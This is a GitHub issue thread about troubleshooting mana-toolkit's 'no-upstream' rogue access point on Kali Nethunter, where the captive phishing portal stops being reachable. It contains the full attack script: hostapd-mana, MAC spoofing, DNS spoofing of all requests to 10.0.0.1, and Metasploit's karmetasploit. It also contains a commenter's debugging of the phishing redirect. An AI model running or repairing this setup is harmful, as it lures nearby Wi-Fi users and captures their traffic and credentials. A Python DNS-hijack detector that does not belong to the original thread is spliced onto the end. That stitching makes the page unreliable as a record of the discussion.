No redirect/access to captive portal. #75

Open
HeavensWing opened this issue Mar 22, 2017 · 2 comments
Comments

@HeavensWing

I'm running Nethunter on an S7E with TL-722n.

When running start-noupstream.sh everything seems fine, the AP comes up and everything as it should. For a short period of time, I can connect with my laptop and hit an http site and be redirected to my captive portal. This all has to be done within about 5-10 seconds. After that AP shows "No internet connectivity" on the laptop and I can't reach the site even by using the 10.0.0.1 address. I can't ping the gateway either.

I cleared all the iptables rules, thinking that an incoming connection was being blocked, yet it didn't help.

I set up the exact same test in a VM on my laptop and everything works fine, so I don't know what's stopping my phone from working.

What is also strange: if I connect to the AP via my phone (the same device I'm running the test on), I can reach the page using the address 10.0.0.1.

/usr/share/mana-toolkit/run-mana/start-noupstream.sh
::::::::::::::
#!/bin/bash

phy=wlan1
conf=/etc/mana-toolkit/hostapd-mana.conf
hostapd=/usr/lib/mana-toolkit/hostapd

hostname WRT54G
echo hostname WRT54G
sleep 2

service network-manager stop
rfkill unblock wlan

ifconfig $phy down
macchanger -r $phy
ifconfig $phy up

sed -i "s/^interface=.*$/interface=$phy/" $conf
sed -i "s/^set INTERFACE .*$/set INTERFACE $phy/" /etc/mana-toolkit/karmetasploit.rc
$hostapd $conf&
sleep 5
ifconfig $phy 10.0.0.1 netmask 255.255.255.0
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1

dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf&
dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf $phy
dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf -i $phy

dnsmasq -C /etc/mana-toolkit/dnsmasq-dhcpd.conf $phy
dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf&
service apache2 start
stunnel4 /etc/mana-toolkit/stunnel.conf
tinyproxy -c /etc/mana-toolkit/tinyproxy.conf&
msfconsole -r /etc/mana-toolkit/karmetasploit.rc&

echo '1' > /proc/sys/net/ipv4/ip_forward
iptables --policy INPUT ACCEPT
iptables --policy FORWARD ACCEPT
iptables --policy OUTPUT ACCEPT
iptables -F
iptables -t nat -F
iptables -t nat -A PREROUTING -i $phy -p udp --dport 53 -j DNAT --to 10.0.0.1

echo "Hit enter to kill me"
read
pkill hostapd
pkill dnsmasq
pkill dnsspoof
pkill tinyproxy
pkill stunnel4
pkill ruby
service apache2 stop
iptables -t nat -F

@sku77

sku77 commented Apr 25, 2017

Same with me. Can you help us with this? I am also running it on Nethunter. I can connect to the phone but can't ping the captive portal 10.0.0.1.
Thanks in advance.

@tanc7

tanc7 commented Sep 7, 2017

Hey, I am not the dev who made this, but from some debugging, I noticed there is an issue with the DNS redirection. At least you managed to get the IP leases fixed. I am assuming you are running the /usr/share/mana-toolkit/run-mana/start-noupstream.sh

By default it is supposed to use DNSMasq and Metasploit's FakeDNS module for the redirection. It tells msfconsole to run this file /etc/mana-toolkit/karmetasploit.rc

It already has the proper pointers, basically saying "all traffic from DNS requests goes to 10.0.0.1", or "phishing page".

The pointer is here: dnsspoof -i $phy -f /etc/mana-toolkit/dnsspoof.conf inside of the file: /usr/share/mana-toolkit/run-mana/start-noupstream.sh

The file is located here: /etc/mana-toolkit/dnsspoof.conf

It does the same thing, again, in Metasploit with the auxiliary/server/fakedns module. But in the latest version of the karmetasploit resource script, it appears it got commented out. 8c0286c

I have been trying other methods, like attempting to use DNSChef instead. But then it locks out DNSMasq because it's fighting for the same port and host.

However, the with-uplink attack works perfectly, but using the no-uplink attack with a captive phishing portal seems to have DNS issues. I tried running "host", "nslookup", and "dig" and it keeps resolving to the real legitimate IP address.
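A client-side check for the behaviour discussed in this thread, where every DNS request is answered with 10.0.0.1: it flags a network whose resolver answers a name that cannot exist, or answers public names with an RFC 1918 address. This is an added example, not code from mana-toolkit or from the commenters; the function names, the canary name and all sample answers are constructed for illustration.

```python
import ipaddress
from collections import Counter

# RFC 1918 ranges; the portal address on this page, 10.0.0.1, is in the first.
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

def is_rfc1918(ip):
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:          # malformed answer: not counted as private
        return False
    return any(addr in net for net in RFC1918)

def assess_dns_answers(answers, canary):
    """answers: {queried name: [A records returned]}, e.g. collected with dig.
    canary: a name that cannot exist (the .invalid TLD is reserved).
    Returns (verdict, findings)."""
    findings = []
    if answers.get(canary):     # a wildcard spoofer answers even this
        findings.append("canary-resolved")
    real = {n: set(ips) for n, ips in answers.items() if n != canary and ips}
    hits = Counter(ip for ips in real.values() for ip in ips)
    for ip, count in sorted(hits.items()):
        if len(real) >= 2 and count == len(real):
            findings.append("single-answer:" + ip)   # weak alone: CDNs share IPs
        if is_rfc1918(ip):
            findings.append("private-answer:" + ip)  # public name, private IP
    strong = any(f == "canary-resolved" or f.startswith("private-answer")
                 for f in findings)
    verdict = "hijacked" if strong else ("suspicious" if findings else "clean")
    return verdict, findings

CANARY = "canary-7f3a9c.invalid"   # hypothetical canary name
# Constructed samples; public answers use documentation address ranges.
SPOOFED = {"example.com": ["10.0.0.1"], "example.org": ["10.0.0.1"],
           "example.net": ["10.0.0.1"], CANARY: ["10.0.0.1"]}
NORMAL = {"example.com": ["192.0.2.10"], "example.org": ["198.51.100.20"],
          "example.net": ["203.0.113.30"], CANARY: []}
SHARED_CDN = {"example.com": ["203.0.113.30"], "example.org": ["203.0.113.30"],
              CANARY: []}

if __name__ == "__main__":
    for label, sample in (("spoofed", SPOOFED), ("normal", NORMAL),
                          ("shared-cdn", SHARED_CDN)):
        print(label, assess_dns_answers(sample, CANARY))
```
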
